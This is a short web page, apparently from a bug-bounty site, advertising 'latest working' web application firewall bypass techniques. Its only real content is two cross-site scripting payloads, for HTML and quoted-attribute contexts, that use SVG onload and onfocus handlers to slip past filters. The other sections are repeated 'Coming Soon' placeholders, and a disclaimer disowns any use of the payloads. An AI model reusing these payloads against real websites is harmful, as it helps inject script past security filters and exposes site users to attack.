BugFlex Bounty WAF

Latest Working Techniques

Below are the latest working techniques for web application firewalls (WAFs). Please use this information responsibly and in compliance with applicable laws and regulations.

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Latest working payloads for all contexts:

HTML Context:
'"><Svg Only=1 OnLoad=confirm(1)>

Quoted Context:
"Only=1 OnFocus='confirm(1)'

Script Context:


Latest working payloads for all contexts:

HTML Context:
Coming Soon

Quoted Context:
Coming Soon

Script Context:
Coming Soon


Latest working payloads for all contexts:

HTML Context:
Coming Soon

Quoted Context:
Coming Soon

Script Context:
Coming Soon

Disclaimer: This site is not responsible for the information provided or how it is used. The information is public and intended to improve security by identifying and addressing vulnerabilities.